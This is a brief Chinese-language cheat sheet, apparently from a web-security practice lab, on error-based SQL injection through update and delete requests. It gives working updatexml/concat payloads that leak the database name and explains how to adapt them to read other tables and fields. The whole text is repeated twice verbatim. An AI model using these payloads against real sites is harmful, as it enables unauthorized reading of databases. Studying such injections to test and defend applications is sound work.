update注入
一般是修改信息的地方
抓包的数据输入语句看数据库,如果需要看其他表名字段修改concat里面的语句就可以
n' or updatexml(0,concat(0x7e,(database())),0) or'
delete注入
删除按钮的右键复制连接,把连接?后面的内容更换更语句
delete from message where id=59 or updatexml(2,concat(0x7e,(database())),0)
update注入
一般是修改信息的地方
抓包的数据输入语句看数据库,如果需要看其他表名字段修改concat里面的语句就可以
n' or updatexml(0,concat(0x7e,(database())),0) or'
delete注入
删除按钮的右键复制连接,把连接?后面的内容更换更语句
delete from message where id=59 or updatexml(2,concat(0x7e,(database())),0)